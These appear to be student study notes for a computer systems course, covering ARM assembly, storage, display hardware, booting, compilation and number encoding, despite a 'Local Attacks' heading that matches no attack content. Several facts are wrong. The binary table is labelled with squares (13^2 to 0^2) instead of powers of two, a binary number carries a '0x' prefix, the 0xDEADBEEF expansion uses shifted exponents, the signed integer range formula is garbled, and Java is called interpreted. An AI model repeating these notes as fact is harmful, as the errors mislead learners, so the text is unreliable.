Local Attacks
int power(long base, long exponent) {
int counter; int result = 1; for (counter = 0; counter < exponent; counter++) result *= base; return result;
}
/* When processor enters the function body the arguments are already placed in registers r0=5 (base), r1=3 (exponent) */
cmp r1, #0 /* Compare exponent to 0 */ mov r2, #1 /* Place constant 1 in register r2,
this corresponds to result = 1 in C code */
ble .L2 /* Exponent was not less than 0, so no jump to L2 mov r3, #0 /* Place constant 0 in register r3,
this corresponds to variable counter */
add r3, r3, #1 /* Perform r3 = 0 + 1 which results in 1 being stored to r3
this corresponds to first invocation of counter++ in C code */
cmp r3, r1 /* Compare counter (1 in this case) to exponent (3), this will be used by bne instruction below */ mul r2, r0, r2 /* Perform r2 = r0 * r2 which results in 1 * 5 = 5 being placed in r2
this corresponds to first invocation of result *= base in C code */
bne .L3 /* The comparison resulted in counter being not equal to exponent, so we jump back to L3
this corresponds to first invocation of counter < exponent in C code */
add r3, r3, #1 /* Perform r3 = 1 + 1 which results in 2 being stored to r3
this corresponds to second invocation of counter++ in C code */
cmp r3, r1 /* Compare counter (2 in this case) to exponent (3), this will be used by bne instruction below */ mul r2, r0, r2 /* Perform r2 = r0 * r2 which results 5 * 5 = 25 being placed in r2
this corresponds to second invocation of result *= base in C code */
bne .L3 /* The comparison resulted in counter being not equal to exponent, so we jump back to L3
this corresponds to second invocation of counter < exponent in C code */
add r3, r3, #1 /* Perform r3 = 2 + 1 which results in 3 being stored to r3
this corresponds to third invocation of counter++ in C code */
cmp r3, r1 /* Compare counter (3 in this case) to exponent (3), this will be used by bne instruction below */ mul r2, r0, r2 /* Perform r2 = r0 * r2 which results 25 * 5 = 125 being placed in r2
this corresponds to third invocation of result *= base in C code */
bne .L3 /* The comparison resulted in counter being equal to exponent, so we DO NOT jump back to L3 */
mov r0, r2 /* Copy register r2 contents (125) to register r0 */ bx lr /* Jump back to caller */ /* Function returns with 125 placed in r0 this is where caller function should expect the return value */ /* The other registers will still hold whatever values were left there: r1 = 3, r2 = 125, r3 = 3 */
Storage abstractions
What is a block device?
In computing (specifically data transmission and data storage), a block, sometimes called a physical record, is a sequence of bytes or bits, usually containing some whole number of records, having a maximum length, a block size.[1] Data thus structured are said to be blocked. The process of putting data into blocks is called blocking, while deblocking is the process of extracting data from blocks. Blocked data is normally stored in a data buffer and read or written a whole block at a time.
What is logical block addressing and what are the benefits compared to older cylinder-head-sector addressing method in terms of harddisks?
Logical block addressing (LBA) is a common scheme used for specifying the location of blocks of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; blocks are located by an integer index, with the first block being LBA 0, the second LBA 1, and so on. Cylinder-head-sector, also known as CHS, is an early method for giving addresses to each physical block of data on a hard disk drive. In the case of floppy drives, for which the same exact diskette medium can be truly low-level formatted to different capacities, this is still true.
What is a disk partition? Disk partitioning is the creation of one or more regions on a hard disk or other secondary storage, so that an operating system can manage information in each region separately.[1] Partitioning is typically the first step of preparing a newly manufactured disk, before any files or directories have been created
What is a file system?
In computing, a file system (or filesystem) is used to control how data is stored and retrieved. Without a file system, information placed in a storage area would be one large body of data with no way to tell where one piece of information stops and the next begins. By separating the data into individual pieces, and giving each piece a name, the information is easily separated and identified. Taking its name from the way paper-based information systems are named, each group of data is called a "file". The structure and logic rules used to manage the groups of information and their names is called a "file system".
What is journaling in terms of filesystems and what are the benefits? Name some journaled filesystems in use nowadays.
A journaling file system is a file system that keeps track of changes not yet committed to the file system's main part by recording the intentions of such changes in a data structure known as a "journal", which is usually a circular log. In the event of a system crash or power failure, such file systems can be brought back online quicker with lower likelihood of becoming corrupted
In the Linux operating system, JFS is supported with the kernel module (since the kernel version 2.4.18pre9-ac4) and the complementary userspace utilities packaged under the name JFSutils. Most Linux distributions support JFS, unless it is specifically removed due to space restrictions or other concerns.
Hardware
Computer hardware Jargon: CPU, RAM, ROM, HDD, SSD, PCI, PCI Express, USB 2.0, USB 3.0, VGA, HDMI, DVI, LCD, TFT, LED, OLED, AMOLED, CRT, PWM Lecture recording #1 Lecture recording #2 starting 12:30 Lecture slides Random access memory, permanent storage, buses, input devices, display technologies, networking Potential exam questions:
Different buses and their uses Bus is a system which help to transact the date between each component in computer or between computers. It has 2 types of buses in side computer (Asus socket 7) and outside of computers (Pc card or IEEE-448)
- PCI
- Peripheral Component Interconnect, is a local computer bus for attaching hardware devices in a computer. Attached devices can take either the form of an integrated circuit fitted onto the motherboard itself or an expansion card that fits into a slot. Typical PCI cards used in PCs include: network cards, sound cards, modems, extra ports such as USB or serial, TV tuner cards and disk controllers.
- PCI Express
- Peripheral Component Interconnect Express (also called PCIe), is a high-speed serial computer expansion bus standard designed to replace the older PCI, PCI-X, and AGP bus standards. PCIe has numerous improvements over the older standards, including higher maximum system bus throughput, lower I/O pin count and smaller physical footprint, better performance scaling for bus devices, a more detailed error detection and reporting mechanism, and native hot-plug functionality. More recent revisions of the PCIe standard provide hardware support for I/O virtualization.
- Mini PCIe
- It is based on PCI Express technoogy. Main point is its small size and its large variety of connectors makes it used for USB2.0 cards, SIM card, Wifi and Bluetooth cards, 3G and GPS cards.
- ExpressCard
- It is an interface to connect peripheral devices to a computer, usually a laptop computer. ExpressCards can connect a variety of devices to a computer including mobile broadband modems, IEEE 1394 (FireWire) connectors, USB connectors, Ethernet network ports, Serial ATA storage devices, solid-state drives, external enclosures for desktop-size PCI Express graphics cards and other peripheral devices, wireless network interface controllers (NIC), TV tuner cards, Common Access Card (CAC) readers, and sound cards.
What are the differences between hard disk drive (HDD) and solid state drive (SSD)?
The traditional spinning hard drive (HDD) is the basic nonvolatile storage on a computer. Hard drives are essentially metal platters with a magnetic coating which stores the data. A read/write head on an arm accesses the data while the platters are spinning in a hard drive enclosure. An SSD does same jobas an HDD, but instead of a magnetic coating on top of platters, the data is stored on interconnected flash memory chips that retain the data even when there's no power present. HDDs have spinning plates with magnetic coating, while SSDs have no moving parts and instead are using flash memory.
Attribute | SSD (Solid State Drive) | HDD (Hard Disk Drive) |
---|---|---|
Power Draw / Battery Life | Less power draw, averages 2 – 3 watts, resulting in 30+ minute battery boost | More power draw, averages 6 – 7 watts and therefore uses more battery |
Cost | Expensive, roughly $0.10 per gigabyte (based on buying a 1TB drive) | Only around $0.06 per gigabyte, very cheap (buying a 4TB model) |
Capacity | Typically not larger than 1TB for notebook size drives; 1TB max for desktops | Typically around 500GB and 2TB maximum for notebook size drives; 6TB max for desktops |
Operating System Boot Time | Around 10-13 seconds average bootup time | Around 30-40 seconds average bootup time |
Noise | There are no moving parts and as such no sound | Audible clicks and spinning can be heard |
Vibration | No vibration as there are no moving parts | The spinning of the platters can sometimes result in vibration |
Heat Produced | Lower power draw and no moving parts so little heat is produced | HDD doesn’t produce much heat, but it will have a measurable amount more heat than an SSD due to moving parts and higher power draw |
Failure Rate | Mean time between failure rate of 2.0 million hours | Mean time between failure rate of 1.5 million hours |
File Copy / Write Speed | Generally above 200 MB/s and up to 550 MB/s for cutting edge drives | The range can be anywhere from 50 – 120MB / s |
Encryption | Full Disk Encryption (FDE) Supported on some models | Full Disk Encryption (FDE) Supported on some models |
File Opening Speed | Up to 30% faster than HDD | Slower than SSD |
Magnetism Affected? | An SSD is safe from any effects of magnetism | Magnets can erase data |
What is the purpose of Flash Translation Layer in terms of solid state drives?
A flash translation layer is used to adapt a fully functional file system to the constraints and restrictions imposed by flash memory devices
What are difference between volatile/non-volatile, RAM, ROM, EEPROM and where are they used?
RAM is Random Access Memory. ROM is Read Only Memory. RAM is the memory available for the operating system, programs and processes to use when the computer is running.
ROM is the memory that comes with your computer that is pre-written to hold the instructions for booting-up the computer.
RAM requires a flow of electricity to retain data (e.g. the computer powered on).
ROM will retain data without the flow of electricity (e.g. when computer is powered off). RAM is a type of volatile memory.
Data in RAM is not permanently written. When you power off your computer the data stored in RAM is deleted. ROM is a type of non- volatile memory.
Data in ROM is permanently written and is not erased when you power off your computer.
There are different types of RAM, including DRAM (Dynamic Random Access Memory) andSRAM (Static Random Access Memory). There are different types of ROM, including PROM (programmable read-only memory) that is manufactured as blank memory (e.g. a CD-ROM) and EPROM (erasable programmable read-only memory).
There are many differences between RAM and ROM memory but there are also a couple similarities (and these are very easy to remember). Both types of memory used by a computer, and they are both required for your computer to operate properly and efficiently.
EEPROM EEPROM , or electrically erasable programmable read only memory, is another step up from EPROM because EEPROM chips do away with some of the drawbacks. For example, EEPROM chips do not need to be removed to be rewritten. Additionally, a portion of the chip can be changed without erasing the entire chip. Furthermore, it does not require special equipment to rewrite the chip.
Volatile memory Non-volatile memory Requires a power source to retain information.Does not require a power source to retain information. When power source is disconnected, information is lost or deleted. When power source is disconnected, information is not deleted. Often used for temporary retention of data, such as with RAM, or for retention of sensitive data. Often used for long-term retention of data, such as files and folders.
What is data retention? Data retention defines the policies of persistent data and records management for meeting legal and business data archival requirements
What are difference between asynchronous/synchronous, dynamic/static RAM and where are they used?
Synchronous Circuits: These are the class of sequential circuits which are governed by a global clock signal generated by an oscillator. The state of all elements of a synchronous circuit changes only by an application of a distributed clock signal. So, this makes the state of a synchronous circuit predictable. Also, synchronous clock signals are less susceptible to noise, circuit anomalies and hence safer to design and operate. But they are limited in operation of speed by the propagation delay of the clock signal in reaching all the elements of the clock signal. The time period of a clock signal should be long enough to accommodate longest propagation delay. Practically all the circuits today are synchronous circuits, except the part where speed of the circuit operation is crucial.
Asynchronous Circuits:
Asyncronous circuits change state only through the inputs received by them. So, the operation is quite instantaneous since they dont have to wait for a clock pulse. They are limited by propagation delay of logic gates only. But asynchronous circuits can transition into a wrong state due to incorrect arrival time of 2 inputs. This is called a race condition. Asynchronous circuits are quite difficult to design for a reliable operation. These are used primarily in high speed systems such as Signal Processing hardware.
The basic difference between Static and Dynamic RAM lies mainly in structure and work principal.
•Firstly the main difference in the structure varies due to transistor and capacitor number and setting as just three to four transistors are required for a Dynamic RAM, but six to eight MOS transistors are necessary for a Static RAM.
•Secondly Dynamic RAM memory can be deleted and refreshed while running the program, but in case of Static RAM it is not possible to refresh programs.
•Data is stored as a charge in a capacitor in Dynamic RAM, where data is stored in flip flop level in Static RAM.
•For refreshing a data another capacitor is required in case of Dynamic capacitor, but no refreshing option is available in Static RAM. •A Dynamic RAM possesses less space in the chip than a Static RAM. •Dynamic RAM is used to create larger RAM space system, where Static RAM create speed- sensitive cache. •Static ram is 4 times more expensive than Dynamic RAM. •Dynamic RAM consumes less power than Static RAM.
•For accessing a data or information, Static RAM takes less time than Dynamic RAM. •Dynamic RAM has higher storage capacity. In fact it can store 4 times than Static RAM.
What is cache? What is cache coherence?
Cache is very fast and small memory that is placed in between the CPU and the main memory. cache coherence is the consistency of shared resource data that ends up stored in multiple local caches. When clients in a system maintain caches of a common memory resource, problems may arise with inconsistent data, which is particularly the case with CPUs in a multiprocessing system.
What are differences between resistive and capacitive touchscreen? [2]
A resistive touchscreen comprises of several layers, out of which the flexible plastic and glass layers are two important electrically resistive layers. The front surface of resistive touchscreen panel is a scratch-resistant plastic with coating of a conductive material (mostly Indium Tin Oxide, ITO), printed underside.
The second important layer is either made of glass or hard plastic and is also coated with ITO.
Both the layers face each other and are separated with a thin gap in between. An electrical resistance is created between both the layers in such a way that charge runs from top to bottom in one layer and side-to-side in another.
When a finger or stylus tip presses down on the outer surface, both the ITO films meet. It is the measure of the resistance of both the layers at point of contact, which leads to get an accurate measurement of the touch position. The accuracy also relies on the evenness of the coating of ITO on both the layers.
A capacitive touchscreen also consists of two spaced layers of glass, which are coated with conductor such as Indium Tin Oxide (ITO). Human body is an electrical charge conductor. When a finger touches the glass of the capacitive surface, it changes the local electrostatic field. The system continuously monitors the movement of each tiny capacitor to find out the exact area where the finger had touched the screen.
Explain how computer mouse works? History of computer mouse.
Ball mouse and optical mouse How does a mouse like this actually work? As you move it across your desk, the ball rolls under its own weight and pushes against two plastic rollers linked to thin wheels (numbered 6 and 7 in the photo). One of the wheels detects movements in an up-and-down direction (like the y-axis on graph/chart paper); the other detects side-to-side movements (like the x-axis on graph paper).
How do the wheels measure your hand movements? As you move the mouse, the ball moves the rollers that turn one or both of the wheels. If you move the mouse straight up, only the y-axis wheel turns; if you move to the right, only the x-axis wheel turns. And if you move the mouse at an angle, the ball turns both wheels at once. Now here's the clever bit. Each wheel is made up of plastic spokes and, as it turns, the spokes repeatedly break a light beam. The more the wheel turns, the more times the beam is broken. So counting the number of times the beam is broken is a way of precisely measuring how far the wheel has turned and how far you've pushed the mouse. The counting and measuring is done by the microchip inside the mouse, which sends details down the cable to your computer. Software in your computer moves the cursor on your screen by a corresponding amount.
An optical mouse works in a completely different way. It shines a bright light down onto your desk from an LED (light-emitting diode) mounted on the bottom of the mouse. The light bounces straight back up off the desk into a photocell (photoelectric cell), also mounted under the mouse, a short distance from the LED. The photocell has a lens in front of it that magnifies the reflected light, so the mouse can respond more precisely to your hand movements. As you push the mouse around your desk, the pattern of reflected light changes, and the chip inside the mouse uses this to figure out how you're moving your hand. The mouse was invented by Douglas Engelbart in 1964 and consisted of a wooden shell, circuit board and two metal wheels that came into contact with the surface it was being used on.
Explain how computer keyboard works? HowStuffworks article Explain that Stuff article Keyboard
There are three separate layers of plastic that work together to detect your key presses. Two of them are covered in electrically conducting metal tracks and there's an insulating layer between them with holes in it. The dots you can see are places where the keys press the two conducting layers together. The lines are electrical connections that allow tiny electric currents to flow when the layers are pressed tight to one another by a key moving down from above.
In the photo below, you can see a closeup of the underside of one key—and, if you look closely, just about see how it works. There's one set of electrical connections on the lower sheet of plastic, printed in light gray. The other set is on the upper sheet of plastic and printed in dark gray. The two sheets are kept apart by a clear plastic layer except at the holes, which is where the keys push down to make the two sheets touch.
Keyboards and typing technology have come a long way over the past couple centuries. The first typing devices were designed and patented in the 1700s while the first manufactured typing devices came about in the 1870s. These machines featured “blind typing” technology, where characters were printed on upside-down pages that remained unseen until completion. Since then, we have seen several updates in design, layout, technology, and function that are more efficient and user-friendly.
Explain how cathode ray tube (CRT) based screen technology works and name pros/cons. [3]
Sort for cathode-ray tubes, CRT monitors were the only choice consumers had for monitor technology for many years. Cathode ray tube (CRT) technology has been in use for more than 100 years, and is found in most televisions and computer monitors. A CRT works by moving an electron beam back and forth across the back of the screen. Each time the beam makes a pass across the screen, it lights up phosphor dots on the inside of the glass tube, thereby illuminating the active portions of the screen. By drawing many such lines from the top to the bottom of the screen, it creates an entire screen of images.
Resolution on a CRT is flexible and a newer model will provide you with viewing resolutions of up to 1600 by 1200 and higher, On a CRT the sharpness of the picture can be blemished by soft edges or a flawed focus. A CRT monitor can be viewed from almost any angle Some users of a CRT may notice a bit of an annoying flicker, which is an inherent trait based on a CRTs physical components. Today's graphics cards, however, can provide a high refresh rate signal to the CRT to get rid of this otherwise annoying problem.. Screen (viewable) Size Most people today tend to look at a 17-inch CRT or bigger monitor. When you purchase a 17-inch CRT monitor, you usually get 16.1 inches or a bit more of actual viewing area, depending on the brand and manufacturer of a specific CRT. Physical Size There is no denying that an LCD wins in terms of its physical size and the space it needs. CRT monitors are big, bulky and heavy. They are not a good choice if you're working with limited desk space, or need to move the monitor around (for some odd reason) between computers
Explain how liquid crystal displays (LCD) work and name pros/cons. [4]
Short for liquid crystal display, LCD technology can be found in digital watches and computer monitors. LCD displays use two sheets of polarizing material with a liquid crystal solution between them. An electric current passed through the liquid causes the crystals to align so that light cannot pass through them. Each crystal, therefore, is like a shutter, either allowing light to pass through or blocking the light. Color LCD displays use two basic techniques for producing color: Passive matrix is the less expensive of the two technologies. The other technology, calledthin film transistor (TFT) or active-matrix, produces color images that are as sharp as traditional CRT displays, but the technology is expensive.
resolution
an LCD the resolution is fixed within each monitor (called a native resolution). The resolution on an LCD can be changed, but if you're running it at a resolution other than its native resolution you will notice a drop in performance or quality. Both types of monitors (newer models) provide bright and vibrant color display. However, LCDs cannot display the maximum color range that a CRT can. In terms of image sharpness, when an LCD is running at its native resolution the picture quality is perfectly sharp. On a CRT the sharpness of the picture can be blemished by soft edges or a flawed focus. A CRT monitor can be viewed from almost any angle, but with an LCD this is often a problem. When you use an LCD, your view changes as you move different angles and distances away from the monitor. At some odd angles, you may notice the picture fade, and possibly look as if it will disappear from view.
Refresh Rate
Some users of a CRT may notice a bit of an annoying flicker, which is an inherent trait based on a CRTs physical components. Today's graphics cards, however, can provide a high refresh rate signal to the CRT to get rid of this otherwise annoying problem. LCDs are flicker-free and as such the refresh rate isn't an important issue with LCDs. Dot Pitch Dot pitch refers to the space between the pixels that make up the images on your screen, and is measured in millimeters. The less space between pixels, the better the image quality. On either type of monitor, smaller dot pitch is better and you're going to want to look at something in the 0.26 mm dot pitch or smaller range. Screen (viewable) Size Most people today tend to look at a 17-inch CRT or bigger monitor. When you purchase a 17-inch CRT monitor, you usually get 16.1 inches or a bit more of actual viewing area, depending on the brand and manufacturer of a specific CRT. The difference between the "monitor size" and the "view area" is due to the large bulky frame of a CRT. If you purchase a 17" LCD monitor, you actually get a full 17" viewable area, or very close to a 17".
Physical Size
There is no denying that an LCD wins in terms of its physical size and the space it needs. CRT monitors are big, bulky and heavy. They are not a good choice if you're working with limited desk space, or need to move the monitor around (for some odd reason) between computers. An LCD on the other hand is small, compact and lightweight. LCDs are thin, take up far less space and are easy to move around. An average 17-inch CRT monitor could be upwards of 40 pounds, while a 17&-inch LCD would weigh in at around 15 pounds. Price As an individual one-time purchase an LCD monitor is going to be more expensive. Throughout a lifetime, however, LCDs are cheaper as they are known to have a longer lifespan and also a lower power consumption. The cost of both technologies have come down over the past few years, and LCDs are reaching a point where smaller monitors are within many consumers' price range. You will pay more for a 17" LCD compared to a 17" CRT, but since the CRT's actual viewing size is smaller, it does bring the question of price back into proportion. Today, fewer CRT monitors are manufactured as the price on LCDs lowers and they become mainstream.
Name screen technologies making use of thin film transistor (TFT) technology? [5]
A thin-film transistor (TFT) is a special kind of field-effect transistor made by depositing thin films of an active semiconductor layer as well as the dielectric layer and metallic contacts over a supporting (but non-conducting) substrate. A common substrate is glass, because the primary application of TFTs is in liquid-crystal displays. This differs from the conventional transistor, where the semiconductor material typically is the substrate, such as a silicon wafer.
Name uses for light polarization filters? [6] [7]
Camera, tv, photography….
What are the benefits of twisted pair cabling and differential signalling? twisted pair cabling Electrical noise going into or coming from the cable can be prevented.[10] Cross-talk is minimized differential signalling The technique minimizes electronic crosstalk and electromagnetic interference, both noise emission and noise acceptance, and can achieve a constant or known characteristic impedance, allowing impedance matching techniques important in a high-speed signal transmission line or high qualitybalanced line and balanced circuit audio signal path.
Active matrix vs passive matrix in display technology
Active-matrix display : An active-matrix display, also known as a TFT (thin-film transistor) display, uses a separate transistor to apply charges to each liquid crystal cell and thus displays high-quality color that is viewable from all angles.
Passive-matrix display : A passive-matrix display uses fewer transistors, requires less power, and is less expensive than an active-matrix display. The color on a passive-matrix display often is not as bright as an active-matrix display. Users view images on a passive-matrix display best when working directly in front of it.
*Compare FAT32 and NTFS NTFS
NTFS is the preferred file system for this version of Windows. It has many benefits over the earlier FAT32 file system, including:
The capability to recover from some disk-related errors automatically, which FAT32 cannot.
Improved support for larger hard disks.
Better security because you can use permissions and encryption to restrict access to specific files to approved users.
FAT32
FAT32, and the lesser-used FAT, were used in earlier versions of Windows operating systems, including Windows 95, Windows 98, and Windows Millennium Edition. FAT32 does not have the security that NTFS provides, so if you have a FAT32 partition or volume on your computer, any user who has access to your computer can read any file on it. FAT32 also has size limitations. You cannot create a FAT32 partition greater than 32GB in this version of Windows, and you cannot store a file larger than 4GB on a FAT32 partition.
Bootloaders, kernels
What is the role of BIOS/UEFI in x86-based machines?
BIOS BIOS (Basic Input/Output System) is read from EEPROM and copied to RAM • Processor starts executing the BIOS code in RAM
• BIOS sets up the hardware and probes storage, USB etc for bootable media
• BIOS reads master boot record of selected bootable media and boot loader takes over
UEFI
UEFI (Unified Extensible Firmware Interface) is a replacement for BIOS. It offers several advantages over previous firmware interface, like: Ability to boot from large disks (over 2 TB) with a GUID Partition Table (GPT) CPU-independent architecture CPU-independent drivers Flexible pre-OS environment, including network capability Modular design
Explain step by step how operating system is booted up, see slides for flowchart.
Turn on the Power button. • CPU pins are reset and registers are set to specific value.
• CPU jump to address of BIOS (0xFFFF0).
• BIOS run POST (Power-On Self Test) and other necessary checks.
• BIOS jumps to MBR(Master Boot Record).
• Primary Bootloader runs from MBR and jumps to Secondary Bootloader.
• Secondary Bootloaders loads Operating System
Describe the functionality provided by general purpose operating system. See architecture of Windows NT, Android, OS X.
User mode in Windows NT is made of subsystems capable of passing I/O requests to the appropriate kernel mode device drivers by using the I/O manager. The user mode layer of Windows NT is made up of the "Environment subsystems," which run applications written for many different types of operating systems, and the "Integral subsystem," which operates system specific functions on behalf of environment subsystems. What are the main differences between real mode and protected mode of x86-based processor? If your computer is in real mode, software communicates directly with the computer's ports and devices. For example, when you print a document, the software sends the data stream directly to the port that holds the printer. However, this paradigm doesn't work in a multitasking OS. Imagine what would happen if multiple programs sent data streams to the ports simultaneously. Ports are dumb, and they have no ability to filter or arrange data streams to match the sending programs. If your computer is in protected mode, the system's ports and devices are protected from the applications that use them. The software thinks it's sending data to a port, but it's a virtual port. The OS is grabbing the data stream and managing it, to ensure that all applications have equal access and to ensure that data from each application is appropriately preserved.
What happens during context switch?
In a switch, the state of the first process (assuming that the first process is the process in execution and is to be switched) must be saved somehow, so that, when the scheduler gets back to the execution of the first process, it can restore this state and continue. The state of the process includes all the registers that the process may be using, especially the program counter, plus any other operating system specific data that may be necessary. This data is usually stored in a data structure called a process control block (PCB), or switchframe. In order to switch processes, the PCB for the first process must be created and saved. The PCBs are sometimes stored upon a per-process stack in kernel memory (as opposed to the user-mode call stack), or there may be some specific operating system defined data structure for this information. Since the operating system has effectively suspended the execution of the first process, it can now load the PCB and context of the second process. In doing so, the program counter from the PCB is loaded, and thus execution can continue in the new process. New processes are chosen from a queue or queues (often referred as ready queue). Process and thread priority can influence which process continues execution, with processes of the highest priority checked first for ready threads to execute.
What is the purpose of paged virtual memory?
In computing, virtual memory is a memory management technique that is implemented using both hardware and software. It maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storageas seen by a process or task appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory. Address translation hardware in the CPU, often referred to as a memory management unit or MMU, automatically translates virtual addresses to physical addresses. Software within the operating system may extend these capabilities to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physically present in the computer. The primary benefits of virtual memory include freeing applications from having to manage a shared memory space, increased security due to memory isolation, and being able to conceptually use more memory than might be physically available, using the technique of paging.
Programming languages
What are the major steps of compilation?
1, Lexical analysis (scanning): the source text is broken into tokens. Syntactic analysis (parsing): tokens are combined to form syntactic structures, typically represented by a parse tree.
2, The parser may be replaced by a syntax-directed editor, which directly generates a parse tree as a product of editing. Semantic analysis: intermediate code is generated for each syntactic structure.
3, Type checking is performed in this phase. Complicated features such as generic declarations and operator overloading (as in Ada and C++) are also processed. Machine-independent optimization: intermediate code is optimized to improve efficiency.
4,Code generation: intermediate code is translated to relocatable object code for the target machine.
5,Machine-dependent optimization: the machine code is optimized.
What are the differences between interpreted, JIT-compilation and traditional compiling?
Traditional Compiled languages are written in a code that can be executed directly on a computer’s processor. This is because a compiler has translated the code into the computer’s “native” language up front, well before the program is even run. This process can take many passes before it is optimized as machine code, but the output is always code that’s ready to be executed—and that executes efficiently, as a result. Some compiled languages include: • C • C++ • C#
INTERPRETED LANGUAGES • An interpreted language is any programming language that isn’t already in “machine code” prior to runtime. Unlike compiled languages, an interpreted language’s translation doesn’t happen beforehand. Translation occurs at the same time as the program is being executed. Some interpreted languages include: • Java • JavaScript • PHP • Perl • Python • Ruby
Just in Time” (JIT) Compilers • JIT compilers are next-generation compilers, but they don’t just run code—they improve it over time. • Java has a JIT compiler as part of the Java Virtual Machine (JVM); C# has one within the .NET framework; and Android has a JIT in its Dalvik Virtual Machine (DVM)
What is control flow? Loops? Conditional statements?
control flow (or alternatively, flow of control) is the order in which individual statements, instructions or function calls of an imperative program are executed or evaluated. The emphasis on explicit control flow distinguishes an imperative programming language from a declarative programming language.
Loop is a sequence of instruction s that is continually repeated until a certain condition is reached. Typically, a certain process is done, such as getting an item of data and changing it, and then some condition is checked such as whether a counter has reached a prescribed number.
conditional statements, conditional expressions and conditional constructs are features of a programming language, which perform different computations or actions depending on whether a programmer-specified boolean conditionevaluates to true or false. Apart from the case of branch predication, this is always achieved by selectively altering the control flow based on some condition.
Data encoding
What is bit? Nibble? Byte? Word?
Bit is a basic unit of information that can hold either True or False value (1 or 0).
Nibble is half of an octet.
Byte is a unit of eight bits. Comes from the number of bits used to encode a single character of text in a computer
Word is a length of bits the processor-architecture can process in bits (8-bit, 32-bit etc)
Write 9375 in binary, hexadecimal?
Binary or base two counting system starts from right with 0 and continues left with each step being to the power of 2.
13^2 | 12^2 | 11^2 | 10^2 | 9^2 | 8^2 | 7^2 | 6^2 | 5^2 | 4^2 | 3^2 | 2^2 | 1^2 | 0^2 |
8192 | 4096 | 2048 | 1024 | 512 | 256 | 128 | 64 | 32 | 16 | 8 | 4 | 2 | 1 |
1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 |
To find out the decimal number (9375) in binary, look if it contains the number equal or smaller. 8192 is smaller than 9375, mark down 1. 9375-8192=1183 contains 1024, mark 1, etc. Number 9375 base ten is 0x10010010011111 in binary, where the '0b' represents base two. From binary to decimal conversion works the other way around. If perplexed, see the explanatory video on Khan academy.
Hexadecimal or base 16 system goes from 0 until 9, then starts with A (10 base 10) until F (15 base 10).
0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | A | B | C | D | E | F |
Conversion from base two to hex is similar to decimal to base two conversion. First, we figure out the multiples of 16:
16^0 | 16^1 | 16^2 | 16^3 | 16^4 |
1 | 16 | 256 | 4096 | 65 536 |
F | 9 | 4 | 2 | <- |
9375 has two multiples of 4096 (9375 - 2*4096 = 9375 - 8192 = 1183), 1183 has 4 multiples of 256 (1183 - 4*256 = 159), 159 has 159 - 9*16 = 15 (15 in decimal is F in hex) and we come to 249F. As with base 2, you can convert this way from hex to decimal. If still don't get it, watch a video on Khan academy.
Write 0xDEADBEEF in decimal?
Following the table above we calculate, 13x16^8 + 14x16^7 + 10x16^6 + 13x16^5 + 11x16^4 + 14x16^3 + 14x16^2 + 15x16^1 = A BIG NUMBER!
What is quantization in terms of signal processing?
Quantization, in mathematics and digital signal processing, is the process of mapping a large set of input values to a (countable) smaller set. Rounding and truncation are typical examples of quantization processes. Quantization is involved to some degree in nearly all digital signal processing, as the process of representing a signal in digital form ordinarily involves rounding. Quantization also forms the core of essentially all lossy compression algorithms. The difference between an input value and its quantized value (such as round-off error) is referred to as quantization error. A device or algorithmic function that performs quantization is called a quantizer. An analog-to-digital converter is an example of a quantizer.
How are integers stored in binary? What integer range can be described using n bits? How many bits are required to describe integer range from n .. m.
If we want to store an integer then it makes sense to store the binary representation of the integer, and in one byte we could store any of the numbers 0 through 255, with the usual binary representation
Integer range :
signed (−(2^n−1)) to (2^n−1 − 1)
Unsigned: 0 to (2n−1)
How many bits are required to describe integer range from n .. m.
n>=LOG_2 (m+1)
How are single precision and double precision floating point numbers stored in binary according to IEEE754 standard? Floating-point multiplication
single precision
This gives from 6 to 9 significant decimal digits precision (if a decimal string with at most 6 significant decimal digits is converted to IEEE 754 single precision and then converted back to the same number of significant decimal digits, then the final string should match the original; and if an IEEE 754 single precision is converted to a decimal string with at least 9 significant decimal digits and then converted back to single, then the final number must match the original[4]).
Sign bit determines the sign of the number, which is the sign of the significand as well. Exponent is either an 8 bit signed integer from −128 to 127 (2's complement) or an 8 bit unsigned integer from 0 to 255 which is the accepted biased form in IEEE 754 binary32 definition. If the unsigned integer format is used, the exponent value used in the arithmetic is the exponent shifted by a bias – for the IEEE 754 binary32 case, an exponent value of 127 represents the actual zero (i.e. for 2e − 127 to be one, e must be 127).
double precision
This gives 15–17 significant decimal digits precision. If a decimal string with at most 15 significant digits is converted to IEEE 754 double precision representation and then converted back to a string with the same number of significant digits, then the final string should match the original. If an IEEE 754 double precision is converted to a decimal string with at least 17 significant digits and then converted back to double, then the final number must match the original.[1]
What is the difference between CMYK and RGB color models? How are YUV, HSV and HSL colorspaces related to RGB? What are sRGB and YCbCr and where are they used?
RGB is based on projecting. Red light plus Green light plus Blue light all projected together create white. Black is encoded as the absence of any color.
CMYK is based on ink. Superimpose Cyan ink plus Magenta ink plus Yellow ink, and you get black, although this format also encodes Black (K) directly. White is encoded by the absence of any color.
Prism uses RGB internally. Exporting in RGB will give you results very close to what you see on screen.
Even though it uses one more number to encode a color, the CMYK scheme encodes a smaller "color space" than does RGB.
When a color is converted from RGB to CMYK, the appearance may change. Most noticeably, bright colors in RGB will look duller and darker in CMYK
How are YUV, HSV and HSL colorspaces related to RGB?
HSV
(hue, saturation, value), also known as HSB (hue, saturation, brightness), is often used by artists because it is often more natural to think about a color in terms of hue and saturation than in terms of additive or subtractive color components. HSV is a transformation of an RGB colorspace, and its components and colorimetry are relative to the RGB colorspace from which it was derived.
HSL
(hue, saturation, lightness/luminance), also known as HSL, HSI (hue, saturation, intensity) or HSD (hue, saturation, darkness), is quite similar to HSV, with "lightness" replacing "brightness". The difference is that the brightness of a pure color is equal to the brightness of white, while the lightness of a pure color is equal to the lightness of a medium gray.
YUV
is a color space typically used as part of a color image pipeline. It encodes a color image or video taking human perception into account, allowing reduced bandwidth for chrominance components, thereby typically enabling transmission errors or compression artifacts to be more efficiently masked by the human perception than using a "direct" RGB-representation.
What are sRGB and YCbCr and where are they used?
